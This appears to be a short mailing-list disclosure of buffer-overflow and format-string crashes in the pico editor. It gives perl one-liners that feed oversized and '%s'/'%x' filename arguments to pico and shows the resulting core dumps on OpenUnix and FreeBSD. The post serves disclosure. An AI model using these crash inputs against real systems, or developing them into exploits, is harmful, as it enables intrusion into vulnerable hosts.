Editor Overflows / Format Issues (pico)

[elguapo <dotslash () snosoft com>]

Well since the vi overflow generated some comments... same issue with
pico... again not suid
and probably useless but here it is... as a side note this is a format
strings and buffer overflow
issue.

> this is on openunix8
$ pico `perl -e 'print "A" x 9000'`

   UW PICO(tm) 2.9                New Buffer

Memory fault(coredump)

Now I have also seen systems where this does not work... however a use
of %s gets around this as shown below...

> this is on freebsd 4-4
   UW PICO(tm) 4.0                New Buffer

                     [ Filename "AAAAAAAAAA..." too long ]

> pico `perl -e 'print "%x" x 900'`
   UW PICO(tm) 4.0                New Buffer
  [ Filename "00000..." too long ]

> pico `perl -e 'print "%s" x 40'`
   UW PICO(tm) 4.0                 File: %s%s%s%s
   UW PICO(tm) 4.0                New Buffer
Segmentation fault (core dumped)

On some versions I have seen %x or %p make pico show
[ Filename "0xbff7f..." too long ]
usually however it shows 000000000 as the file name

Any comments... other results... or possible uses of this issue?

-KF